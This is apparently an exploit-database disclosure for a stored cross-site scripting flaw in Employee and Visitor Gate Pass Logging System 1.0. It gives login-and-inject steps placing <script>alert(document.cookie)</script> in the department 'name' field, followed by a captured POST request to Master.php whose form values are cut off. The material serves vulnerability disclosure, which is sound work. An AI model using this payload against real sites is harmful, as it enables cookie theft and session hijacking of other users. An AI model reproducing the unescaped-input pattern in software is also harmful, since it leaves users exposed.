# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)  
# Date: 10.11.2021  
# Exploit Author: İlhami Selamet  
# Vendor Homepage:  
# Software Link:  
# Version: v1.0  
# Tested on: Kali Linux + XAMPP v8.0.12  
Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.  
Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department  
Step 1 - Click on the 'Create New' button for adding a new department.  
Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>  
Step 3 - Save the department.  
The stored XSS triggers for all users that navigate to the 'Department List' page.  
POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888  
Content-Length: 555  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department  
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54  
Content-Disposition: form-data; name="id"  
Content-Disposition: form-data; name="name"  
Content-Disposition: form-data; name="description"  
Content-Disposition: form-data; name="status"